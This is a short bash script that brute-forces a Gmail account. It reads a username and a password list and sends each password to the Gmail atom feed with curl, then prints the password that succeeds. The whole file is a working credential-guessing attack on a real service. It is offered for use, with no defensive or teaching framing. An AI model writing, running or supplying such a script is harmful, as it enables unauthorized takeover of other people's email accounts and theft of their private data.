#!/bin/bash

if [ $# -lt 2 ]
then
  echo "Usage: $0 gmail_username passwordlist.lst";
  exit
fi

readarray -t pword < <(cat $2);
uname=$1;

for file in "${pword[@]}"; do

CURL=$(curl --fail --silent -m1 --user $uname:$file "https://mail.google.com/mail/feed/atom");

 if [[ ! "${CURL}" ]] ; then
 echo "Failed login.";

        else echo -e "\nPASSWORD WAS: $file";
 fi

done
